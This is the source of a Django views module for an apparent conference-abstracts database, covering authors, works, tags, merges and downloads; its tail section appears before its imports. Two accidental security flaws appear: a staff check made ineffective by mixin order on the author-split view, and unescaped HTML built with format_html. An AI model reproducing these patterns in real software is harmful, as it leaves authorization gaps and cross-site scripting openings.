context) @user_is_staff @transaction.atomic def keyword_multi_merge(request): context = { "tag_merge_form": KeywordMultiMergeForm, "tag_category": "Keyword", "multi_merge_view": "keyword_multi_merge", } if request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = KeywordMultiMergeForm(request.POST) if raw_form.is_valid(): target_keyword = raw_form.cleaned_data["into"] source_keywords = raw_form.cleaned_data["sources"].exclude( pk=target_keyword.pk ) for keyword in source_keywords: old_keyword_id = keyword.title merge_results = keyword.merge(target_keyword) messages.success( request, f"Keyword {old_keyword_id} has been merged into {target_keyword}, and the old keyword entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} keywords updated" ) return redirect("keyword_edit", pk=target_keyword.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_multi_merge.html", context) class TopicCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Topic template_name = "generic_form.html" extra_context = {"form_title": "Create topic", "cancel_view": "full_topic_list"} fields = ["title"] success_message = "Topic '%(title)s' created" success_url = reverse_lazy("full_topic_list") class TopicDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Topic template_name = "generic_form.html" extra_context = {"form_title": "Delete topic", "cancel_view": "full_topic_list"} success_message = "Topic '%(title)s' deleted" success_url = reverse_lazy("full_topic_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(TopicDelete, self).delete(request, *args, **kwargs) class TopicEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Topic template_name = "generic_form.html" extra_context = { "form_title": "Update topic", "cancel_view": "full_topic_list", "merge_view": "topic_merge", "delete_view": "topic_delete", } fields = ["title"] success_message = "Topic '%(title)s' updated" success_url = reverse_lazy("full_topic_list") class TopicList(LoginRequiredMixin, ListView): model = Topic template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Topics", "tag_edit_view": "topic_edit", "tag_create_view": "topic_create", "tag_filter_form": TagForm, "tag_list_view": "full_topic_list", "multi_merge": "topic_multi_merge", "filter_param_name": "topics", } def get_queryset(self): base_results_set = Topic.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Topic.objects.count() return context @user_is_staff @transaction.atomic def topic_merge(request, topic_id): topic = get_object_or_404(Topic, pk=topic_id) affected_elements = topic.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": topic, "tag_merge_form": TopicMergeForm, "tag_category": "Topic", "merge_view": "topic_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this topic. """ return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = TopicMergeForm(request.POST) if raw_form.is_valid(): target_topic = raw_form.cleaned_data["into"] if topic == target_topic: """ If the user chooses the existing topic, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a topic into itself. Please select a different topic.", ) return redirect("topic_merge", topic_id=topic_id) else: old_topic_id = str(topic) merge_results = topic.merge(target_topic) messages.success( request, f"Topic {old_topic_id} has been merged into {target_topic}, and the old topic entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} topics updated" ) return redirect("topic_edit", pk=target_topic.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) @user_is_staff @transaction.atomic def topic_multi_merge(request): context = { "tag_merge_form": TopicMultiMergeForm, "tag_category": "Topic", "multi_merge_view": "topic_multi_merge", } if request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = TopicMultiMergeForm(request.POST) if raw_form.is_valid(): target_topic = raw_form.cleaned_data["into"] source_topics = raw_form.cleaned_data["sources"].exclude(pk=target_topic.pk) for topic in source_topics: old_topic_id = topic.title merge_results = topic.merge(target_topic) messages.success( request, f"Topic {old_topic_id} has been merged into {target_topic}, and the old topic entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} topics updated" ) return redirect("topic_edit", pk=target_topic.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_multi_merge.html", context) class LanguageCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Create language", "cancel_view": "full_language_list", } fields = ["title", "code"] success_message = "Language '%(title)s' created" success_url = reverse_lazy("full_language_list") class LanguageDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Delete language", "cancel_view": "full_language_list", } success_message = "Language '%(title)s' deleted" success_url = reverse_lazy("full_language_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(LanguageDelete, self).delete(request, *args, **kwargs) class LanguageEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Update language", "cancel_view": "full_language_list", "merge_view": "language_merge", "delete_view": "language_delete", } fields = ["title", "code"] success_message = "Language '%(title)s' updated" success_url = reverse_lazy("full_language_list") class LanguageList(LoginRequiredMixin, ListView): model = Language template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Languages", "tag_edit_view": "language_edit", "tag_create_view": "language_create", "tag_filter_form": TagForm, "tag_list_view": "full_language_list", "filter_param_name": "languages", } def get_queryset(self): base_results_set = Language.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Language.objects.count() return context @user_is_staff @transaction.atomic def language_merge(request, language_id): language = get_object_or_404(Language, pk=language_id) affected_elements = language.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": language, "tag_merge_form": LanguageMergeForm, "tag_category": "Language", "merge_view": "language_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this language. """ return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = LanguageMergeForm(request.POST) if raw_form.is_valid(): target_language = raw_form.cleaned_data["into"] if language == target_language: """ If the user chooses the existing language, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a language into itself. Please select a different language.", ) return redirect("language_merge", language_id=language_id) else: old_language_id = str(language) merge_results = language.merge(target_language) messages.success( request, f"Language {old_language_id} has been merged into {target_language}, and the old language entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} languages updated" ) return redirect("language_edit", pk=target_language.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) class WorkTypeCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Create work_type", "cancel_view": "full_work_type_list", } fields = ["title", "is_parent"] success_message = "Abstract type '%(title)s' created" success_url = reverse_lazy("full_work_type_list") class WorkTypeDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Delete work_type", "cancel_view": "full_work_type_list", } success_message = "Abstract type '%(title)s' deleted" success_url = reverse_lazy("full_work_type_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(WorkTypeDelete, self).delete(request, *args, **kwargs) class WorkTypeEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Update abstract type", "cancel_view": "full_work_type_list", "merge_view": "work_type_merge", "delete_view": "work_type_delete", } fields = ["title", "is_parent"] success_message = "Abstract '%(title)s' updated" success_url = reverse_lazy("full_work_type_list") class WorkTypeList(LoginRequiredMixin, ListView): model = WorkType template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Abstract Types", "tag_edit_view": "work_type_edit", "tag_create_view": "work_type_create", "tag_filter_form": TagForm, "tag_list_view": "full_work_type_list", "filter_param_name": "work_type", } def get_queryset(self): base_results_set = WorkType.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = WorkType.objects.count() return context @user_is_staff @transaction.atomic def work_type_merge(request, work_type_id): work_type = get_object_or_404(WorkType, pk=work_type_id) affected_elements = work_type.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": work_type, "tag_merge_form": WorkTypeMergeForm, "tag_category": "Abstract Type", "merge_view": "work_type_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this work_type. """ return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = WorkTypeMergeForm(request.POST) if raw_form.is_valid(): target_work_type = raw_form.cleaned_data["into"] if work_type == target_work_type: """ If the user chooses the existing work_type, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a work_type into itself. Please select a different work_type.", ) return redirect("work_type_merge", work_type_id=work_type_id) else: old_work_type_id = str(work_type) merge_results = work_type.merge(target_work_type) messages.success( request, f"WorkType {old_work_type_id} has been merged into {target_work_type}, and the old work_type entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} work_types updated" ) return redirect("work_type_edit", pk=target_work_type.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context)
36.697767
176
0.59906
from django.shortcuts import render from django.http import HttpResponse, JsonResponse, StreamingHttpResponse, FileResponse from django.template import loader from django.shortcuts import get_object_or_404, render, redirect from django.views import View from django.views.generic import DetailView, ListView from django.db.models import ( Count, Max, Min, Q, F, Prefetch, Subquery, OuterRef, ExpressionWrapper, FloatField, BooleanField, ) from django.db.models.functions import Concat, FirstValue, Cast from django.core import management from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator from django.db.models.functions import Coalesce from django.contrib.postgres.search import SearchRank, SearchQuery from django.contrib.postgres.aggregates import StringAgg from django.urls import reverse, reverse_lazy from django.contrib import messages from django.contrib.messages.views import SuccessMessageMixin from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin from django.contrib.auth.decorators import login_required, user_passes_test from dal.autocomplete import Select2QuerySetView from django.views.generic.edit import CreateView, DeleteView, UpdateView from django.db import transaction, IntegrityError from django.forms.models import model_to_dict from django.forms import formset_factory, inlineformset_factory, modelformset_factory from django.conf import settings from django.utils.html import format_html from django.views.decorators.cache import cache_page import glob from os.path import basename, getmtime from datetime import datetime import csv import sys from operator import attrgetter from tempfile import NamedTemporaryFile, TemporaryDirectory import zipfile from . import models from .models import ( Work, WorkType, Author, Conference, Institution, Appellation, Affiliation, ConferenceSeries, SeriesMembership, Organizer, Country, Keyword, Topic, Language, CountryLabel, Authorship, License, ) from .forms import ( WorkFilter, AuthorFilter, AuthorMergeForm, WorkForm, WorkAuthorshipForm, FullInstitutionForm, InstitutionMergeForm, AffiliationEditForm, AffiliationMergeForm, KeywordMergeForm, TagForm, TopicMergeForm, AffiliationMultiMergeForm, KeywordMultiMergeForm, ConferenceForm, ConferenceCheckoutForm, ConferenceSeriesInline, LanguageMergeForm, WorkTypeMergeForm, InstitutionMultiMergeForm, TopicMultiMergeForm, ConferenceXMLUploadForm, ) PERMISSIONS_ERROR_TEXT = ( "Please contact the lead project editors to edit this part of the database." ) def cache_for_anon(func): def wrap(request, *args, **kwargs): if request.user.is_authenticated: return func(request, *args, **kwargs) else: return cache_page(settings.CACHES["default"]["TIMEOUT"])(func)( request, *args, **kwargs ) return wrap def user_is_staff(func): def wrap(request, *args, **kwargs): if not request.user.is_authenticated: return redirect(f"{reverse('login')}?next={request.path}") if request.user.is_staff: return func(request, *args, **kwargs) else: messages.warning(request, PERMISSIONS_ERROR_TEXT) return redirect("home_view") return wrap class StaffRequiredMixin: def dispatch(self, *args, **kwargs): if not self.request.user.is_authenticated: return redirect(f"{reverse('login')}?next={self.request.path}") if self.request.user.is_staff: return super().dispatch(*args, **kwargs) else: messages.warning(self.request, PERMISSIONS_ERROR_TEXT) return redirect("home_view") class ItemLabelAutocomplete(Select2QuerySetView): def get_selected_result_label(self, item): return self.get_result_label(item) class WorkAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Work.objects.all() parents_only = self.forwarded.get("parents_only", None) if parents_only: qs = qs.filter(work_type__is_parent=True) conference = self.forwarded.get("conference", None) if conference: qs = qs.filter(conference=conference) if self.q: qs = qs.filter(title__icontains=self.q) return qs.all() class AppellationAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Appellation.objects.all() if self.q: qs = qs.filter( Q(first_name__icontains=self.q) | Q(last_name__icontains=self.q) ).all() return qs class KeywordAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Keyword.objects.annotate(n_works=Count("works")).order_by("-n_works") if self.q: qs = qs.filter(title__icontains=self.q).all() return qs def get_result_label(self, item): return f"{item} ({item.n_works} works)" class LanguageAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Language.objects.annotate(n_works=Count("works")).order_by( "-n_works", "title" ) if self.q: qs = qs.filter(title__icontains=self.q).all() return qs def get_result_label(self, item): return f"{item} ({item.n_works} works)" class TopicAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Topic.objects.annotate(n_works=Count("works")).order_by("-n_works") if self.q: qs = qs.filter(title__icontains=self.q).all() return qs def get_result_label(self, item): return f"{item} ({item.n_works} works)" class CountryAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Country.objects.annotate( n_works=Count( "institutions__affiliations__asserted_by__work", distinct=True ) ).order_by("-n_works") if self.q: qs = qs.filter( Q(pref_name__icontains=self.q) | Q(names__name__icontains=self.q) ) return qs.distinct() def get_result_label(self, item): return f"{item} ({item.n_works} works)" class InstitutionAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = ( Institution.objects.annotate( n_works=Count("affiliations__asserted_by__work", distinct=True) ) .select_related("country") .order_by("-n_works") ) if self.q: qs = qs.filter(name__icontains=self.q).all() return qs def get_result_label(self, item): if item.country is not None: c_label = item.country.pref_name else: c_label = "" location_statement = ", ".join( [l for l in [item.state_province_region, c_label] if l != ""] ) return f"{item} ({item.n_works} works)<br><small text-class='muted'>{location_statement}</small>" class AffiliationAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = ( Affiliation.objects.annotate( n_works=Count("asserted_by__work", distinct=True) ) .select_related("institution", "institution__country") .order_by("-n_works") ) inst_filter = self.forwarded.get("institution", None) if inst_filter: qs = qs.filter(institution=inst_filter) if self.q: qs = qs.filter( Q(department__icontains=self.q) | Q(institution__name__icontains=self.q) ).distinct() return qs def get_result_label(self, item): if item.institution.country is not None: c_label = item.institution.country.pref_name else: c_label = "" location_statement = ", ".join( [l for l in [item.institution.state_province_region, c_label] if l != ""] ) return f"{item} ({item.n_works} works)<br><small text-class='muted'>{location_statement}</small>" class ConferenceAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Conference.objects.annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ) ).order_by("year", "main_series", "short_title", "theme_title") if self.q: qs = qs.filter(search_text__icontains=self.q).distinct() return qs def get_result_label(self, item): if item.main_series: return f"{item.main_series} - {item.year} - {item.short_title}" elif item.short_title: return f"{item.year} - {item.short_title}" else: return f"{item.year} - {item.theme_title}" class AuthorAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Author.objects.annotate( n_works=Count("authorships", distinct=True), main_last_name=Max("appellations__last_name"), main_first_name=Max("appellations__first_name"), ).order_by("main_last_name", "main_first_name", "-n_works") if self.q: qs = qs.filter(appellations_index__icontains=self.q).distinct() return qs def get_result_label(self, item): return format_html( f"{item.most_recent_appellation} ({item.n_works} works)<br><small text-class='muted'>(All names: {item.appellations_index})</small>" ) def work_view(request, work_id): related_conference = Conference.objects.annotate( n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True ), ).prefetch_related("series", "organizers") work = get_object_or_404( Work.objects.select_related("work_type", "full_text_license").prefetch_related( Prefetch("conference", queryset=related_conference), "keywords", "topics", "languages", Prefetch( "session_papers", queryset=Work.objects.prefetch_related( Prefetch( "authorships", queryset=Authorship.objects.select_related("appellation"), ), ), ), Prefetch( "parent_session", queryset=Work.objects.prefetch_related( Prefetch( "authorships", queryset=Authorship.objects.select_related( "author", "appellation" ), ) ), ), ), pk=work_id, ) authorships = ( Authorship.objects.filter(work_id=work_id) .order_by("authorship_order") .distinct() .select_related("work", "author", "appellation") .prefetch_related( Prefetch( "affiliations", queryset=Affiliation.objects.select_related( "institution", "institution__country" ), ) ) ) context = {"work": work, "authorships": authorships} return render(request, "work_detail.html", context) def author_view(request, author_id): author = get_object_or_404(Author, pk=author_id) sorted_authorships = ( Authorship.objects.filter(author=author) .order_by("work__conference__year") .prefetch_related( Prefetch("work", queryset=Work.objects.select_related("conference")) ) ) appellations = ( Appellation.objects.filter(asserted_by__author=author) .distinct() .annotate(latest_year=Max("asserted_by__work__conference__year")) .order_by("-latest_year") .prefetch_related(Prefetch("asserted_by", queryset=sorted_authorships)) ) affiliations = ( Affiliation.objects.filter(asserted_by__author=author) .distinct() .annotate(latest_year=Max("asserted_by__work__conference__year")) .order_by("-latest_year") .prefetch_related( Prefetch("asserted_by", queryset=sorted_authorships), Prefetch( "institution", queryset=Institution.objects.select_related("country") ), ) ) works = ( Work.objects.filter(authorships__author=author) .order_by("conference__year") .distinct() .select_related("conference", "parent_session", "work_type") .prefetch_related( Prefetch( "conference", queryset=Conference.objects.prefetch_related("series", "organizers"), ), "session_papers", "keywords", "topics", "languages", Prefetch( "authorships", queryset=Authorship.objects.select_related("appellation", "author"), ), ) ) author_admin_page = reverse("admin:abstracts_author_change", args=(author.pk,)) context = { "author": author, "works": works, "appellations": appellations, "affiliations": affiliations, "author_admin_page": author_admin_page, } return render(request, "author_detail.html", context) class AuthorSplit(DetailView, StaffRequiredMixin): model = Author template_name = "author_split.html" context_object_name = "original_author" def get_context_data(self, **kwargs): authorships = Authorship.objects.filter(author=self.get_object()).order_by( "work__conference__year" ) return {self.context_object_name: self.get_object(), "authorships": authorships} @transaction.atomic def post(self, request, *args, **kwargs): authorships_to_move = request.POST.getlist("splitselect") try: new_author = Author.objects.create() Authorship.objects.filter(id__in=authorships_to_move).update( author=new_author ) self.get_object().save() new_author.save() messages.success( request, f"{len(authorships_to_move)} authorships moved to new author id {new_author.id}", ) return redirect("author_detail", new_author.id) except: messages.error(request, str(authorships_to_move)) return redirect("author_split", self.get_object().id) class XMLView(DetailView, LoginRequiredMixin): model = Work context_object_name = "work" def get(self, request, *args, **kwargs): response = HttpResponse(self.get_object().full_text, content_type="xhtml+xml") response[ "Content-Disposition" ] = f"attachment; filename={self.get_object().id}.xml" return response class AuthorList(ListView): context_object_name = "author_list" template_name = "author_list.html" paginate_by = 50 def get_queryset(self): base_result_set = Author.objects.exclude(appellations__isnull=True).annotate( n_conferences=Count("works__conference", distinct=True) ) raw_filter_form = AuthorFilter(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data order_res = filter_form["ordering"] if order_res is None or order_res == "": order_res = "last_name" result_set = base_result_set.annotate( last_name=Max("appellations__last_name"), n_works=Count("authorships", distinct=True), ).order_by(order_res) author_res = filter_form["author"] if author_res is not None: result_set = result_set.filter(id=author_res.id) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter( authorships__affiliations=affiliation_res ) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter( authorships__affiliations__institution=institution_res ) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter( authorships__affiliations__institution__country=country_res ) conference_res = filter_form["conference"] if conference_res is not None: result_set = result_set.filter(works__conference=conference_res) if filter_form["singleton"]: result_set = result_set.filter(n_conferences=1) name_res = filter_form["name"] if name_res != "": result_set = result_set.filter(appellations_index__icontains=name_res) first_name_res = filter_form["first_name"] if first_name_res != "": result_set = result_set.filter( authorships__appellation__first_name__icontains=first_name_res ) last_name_res = filter_form["last_name"] if last_name_res != "": result_set = result_set.filter( authorships__appellation__last_name__icontains=last_name_res ) newest_authorship = Authorship.objects.filter( author=OuterRef("pk") ).order_by("-work__conference__year") annotated_authors = result_set.annotate( main_affiliation_department=Subquery( newest_authorship.values("affiliations__department")[:1] ), main_affiliation_institution=Subquery( newest_authorship.values("affiliations__institution__name")[:1] ), main_affiliation_institution_city=Subquery( newest_authorship.values("affiliations__institution__city")[:1] ), main_affiliation_institution_state=Subquery( newest_authorship.values( "affiliations__institution__state_province_region" )[:1] ), main_affiliation_institution_country=Subquery( newest_authorship.values( "affiliations__institution__country__pref_name" )[:1] ), most_recent_first_name=Subquery( newest_authorship.values("appellation__first_name")[:1] ), most_recent_last_name=Subquery( newest_authorship.values("appellation__last_name")[:1] ), n_works=Count("authorships", distinct=True), ) return annotated_authors else: messages.warning( self.request, "Query parameters not recognized. Check your URL and try again.", ) return base_result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["author_filter_form"] = AuthorFilter(data=self.request.GET) context["available_authors_count"] = Author.objects.count() context["redirect_url"] = reverse("author_list") return context def annotate_multiple_series(qs): return qs.annotate( n_conferences=Count("conferences", distinct=True), earliest_year=Min("conferences__year"), latest_year=Max("conferences__year"), n_complete=Count( "conferences", filter=Q(conferences__entry_status="c"), distinct=True ), n_in_progress=Count( "conferences", filter=Q(conferences__entry_status="i"), distinct=True ), n_in_review=Count( "conferences", filter=Q(conferences__entry_status="r"), distinct=True ), n_remaining=F("n_conferences") - F("n_complete") - F("n_in_progress") - F("n_in_review"), pct_complete=( Cast(F("n_complete"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, pct_in_progress=( Cast(F("n_in_progress"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, pct_in_review=( Cast(F("n_in_review"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, pct_remaining=( Cast(F("n_remaining"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, ).order_by("title") def annotate_single_series(qs): res = qs.aggregate( earliest_year=Min("year"), latest_year=Max("year"), n_conferences=Count("id", distinct=True), n_complete=Count("id", filter=Q(entry_status="c"), distinct=True), n_in_progress=Count("id", filter=Q(entry_status="i"), distinct=True), n_in_review=Count("id", filter=Q(entry_status="r"), distinct=True), ) res["n_remaining"] = ( res["n_conferences"] - res["n_complete"] - res["n_in_progress"] - res["n_in_review"] ) if res["n_conferences"] > 0: res["pct_complete"] = (res["n_complete"] / res["n_conferences"]) * 100 res["pct_in_progress"] = (res["n_in_progress"] / res["n_conferences"]) * 100 res["pct_in_review"] = (res["n_in_review"] / res["n_conferences"]) * 100 res["pct_remaining"] = (res["n_remaining"] / res["n_conferences"]) * 100 else: res["pct_complete"] = 0 res["pct_in_progress"] = 0 res["pct_in_review"] = 0 res["pct_remaining"] = 0 return res def conference_series_qs(): return annotate_multiple_series( ConferenceSeries.objects.exclude(conferences__isnull=True) ) class ConferenceSeriesList(ListView): context_object_name = "series_list" template_name = "conference_series_list.html" def get_queryset(self): base_result_set = conference_series_qs() return base_result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) sa_conf = Conference.objects.filter(series__isnull=True) context["standalone_conferences"] = annotate_single_series(sa_conf) context["standalone_conference_count"] = sa_conf.count() return context class ConferenceSeriesDetail(DetailView): model = ConferenceSeries template_name = "conference_series_detail.html" context_object_name = "series" def get_member_conferences(self): return Conference.objects.filter(series_memberships__series=self.get_object()) def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["series_progress"] = annotate_single_series( self.get_member_conferences() ) series_order_subquery = SeriesMembership.objects.filter( conference=OuterRef("pk"), series=self.get_object() ).order_by("number") context["conference_list"] = ( self.get_member_conferences() .annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), series_order=Subquery(series_order_subquery.values("number")[:1]), ) .order_by("series_order") .prefetch_related( "series_memberships", "series_memberships__series", "organizers", "country", "hosting_institutions", "hosting_institutions__country", "documents", ) ) context["series_list"] = conference_series_qs() return context class StandaloneList(View): template_name = "conference_series_detail.html" def get_standalone_list(self): qs = ( Conference.objects.filter(series__isnull=True) .annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), ) .order_by("year", "short_title", "theme_title") .prefetch_related( "series_memberships", "series_memberships__series", "organizers", "country", "hosting_institutions", "hosting_institutions__country", "documents", ) ) return qs def get(self, request): faux_series = { "title": "Standalone Events", "notes": "Digital humanities events not belonging to a larger series, such symposia or workshops.", "n_conferences": self.get_standalone_list().count(), } context = { "conference_list": self.get_standalone_list(), "series": faux_series, "series_list": conference_series_qs(), "series_progress": annotate_single_series(self.get_standalone_list()), } return render(request, self.template_name, context) def home_view(request): conference_count = Conference.objects.count() years_count = Conference.objects.aggregate(year_range=Max("year") - Min("year"))[ "year_range" ] work_count = Work.objects.count() author_count = Author.objects.exclude(authorships__work__isnull=True).count() institution_count = Institution.objects.count() country_count = ( Country.objects.filter( Q(institutions__affiliations__asserted_by__work__isnull=False) | Q(institutions__conferences__isnull=False) | Q(conferences__isnull=False) ) .distinct() .count() ) context = { "site": { "conference_count": conference_count, "years_count": years_count, "work_count": work_count, "author_count": author_count, "institution_count": institution_count, "country_count": country_count, } } return render(request, "index.html", context) @user_is_staff @transaction.atomic def author_merge_view(request, author_id): author = get_object_or_404(Author, pk=author_id) if request.method == "GET": context = {"merging": author, "author_merge_form": AuthorMergeForm} return render(request, "author_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = AuthorMergeForm(request.POST) if raw_form.is_valid(): target_author = raw_form.cleaned_data["into"] if author == target_author: """ If the user chooses the existing author, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an author into themselves. Please select a different author.", ) return redirect("author_merge", author_id=author_id) else: old_author_string = str(author) merge_results = author.merge(target_author) target_author.user_last_updated = request.user target_author.save() messages.success( request, f"Author {old_author_string} has been merged into {target_author}, and the old author entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} authorships updated" ) return redirect("author_detail", author_id=target_author.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "author_merge.html", context) def field_required(field): if field.get_internal_type() in ("CharField", "TextField") and field.blank: return False if field.null: return False return True def download_data(request): data_dictionary = [] if request.user.is_authenticated: dt_config = settings.PRIVATE_DATA_TABLE_CONFIG zip_url = reverse("private_all_tables_download") else: dt_config = settings.PUBLIC_DATA_TABLE_CONFIG zip_url = reverse("public_all_tables_download") denormalized_url = reverse("works_download") denormalized_last_updated = datetime.fromtimestamp( getmtime(f"{settings.DATA_OUTPUT_PATH}/{settings.DENORMALIZED_WORKS_NAME}.zip") ) for m in dt_config["CONFIGURATION"]: model = attrgetter(m["model"])(models) if "manual_model_description" in m: model_description = m["manual_model_description"] else: try: model_description = model.model_description except: model_description = None all_model_fields = [ { "name": f.name, "relation": f.is_relation, "help_text": f.help_text, "related_model": str(f.related_model) .replace("<class 'abstracts.models.", "") .replace("'>", ""), "type": f.get_internal_type(), "required": field_required(f), } for f in model._meta.fields if not f.one_to_many and f.name not in m["exclude_fields"] ] if m.get("include_string", False): all_model_fields.append( { "name": "label", "relation": None, "help_text": "General label for this object", "related_model": None, "type": "CharField", "required": True, } ) data_dictionary.append( { "model": m["model"], "model_description": model_description, "csv_name": m["csv_name"], "fields": all_model_fields, } ) normalized_last_updated = datetime.fromtimestamp( getmtime(f"{settings.DATA_OUTPUT_PATH}/{dt_config['DATA_ZIP_NAME']}") ) context = { "zip_url": zip_url, "denormalized_url": denormalized_url, "denormalized_last_updated": denormalized_last_updated, "normalized_last_updated": normalized_last_updated, "data_dictionary": data_dictionary, "denormalized_data_dictionary": settings.DENORMALIZED_HEADERS, } return render(request, "downloads.html", context) def download_works_csv(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.DENORMALIZED_WORKS_NAME}.zip" response = FileResponse(open(target_zip, "rb")) return response def public_download_all_tables(request): target_zip = 